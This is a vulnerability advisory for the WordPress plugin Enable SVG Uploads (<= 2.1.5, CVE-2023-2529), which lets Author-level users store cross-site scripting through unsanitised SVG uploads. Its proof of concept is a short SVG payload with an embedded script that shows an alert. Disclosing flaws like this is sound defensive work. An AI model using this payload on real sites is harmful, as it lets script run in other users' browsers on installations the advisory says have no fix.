WordPress Plugin Vulnerabilities

Enable SVG Uploads <= 2.1.5 - Author+ Stored XSS via SVG

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

1. Upload a malicious SVG: <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> alert("XSS Test"); </script> </svg>

2. Add to post and view SVG to see XSS.

Affects Plugins

Plugin icon
enable-svg-uploads
No known fix

References

CVE
CVE-2023-2529

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.8 (medium)

Miscellaneous

Original Researcher
Mateus Machado Tesser
Submitter
Mateus Machado Tesser
Verified
Yes
WPVDB ID
4ac03907-2373-48f0-bca1-8f7073c06b18

Timeline

Publicly Published
2023-06-19 (about 5 months ago)
Added
2023-06-19 (about 5 months ago)
Last Updated
2023-06-19 (about 5 months ago)

Other

Published
Title
Published
2023-07-18
Title
Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
Published
2023-04-18
Title
BBSpoiler <= 2.01 - Contributor+ Stored XSS
Published
2021-05-17
Title
Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS
Published
2021-01-15
Title
Pods < 2.7.27 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2023-05-16
Title
Contact Form Email < 1.3.38 - Unauthenticated Stored Cross-Site Scripting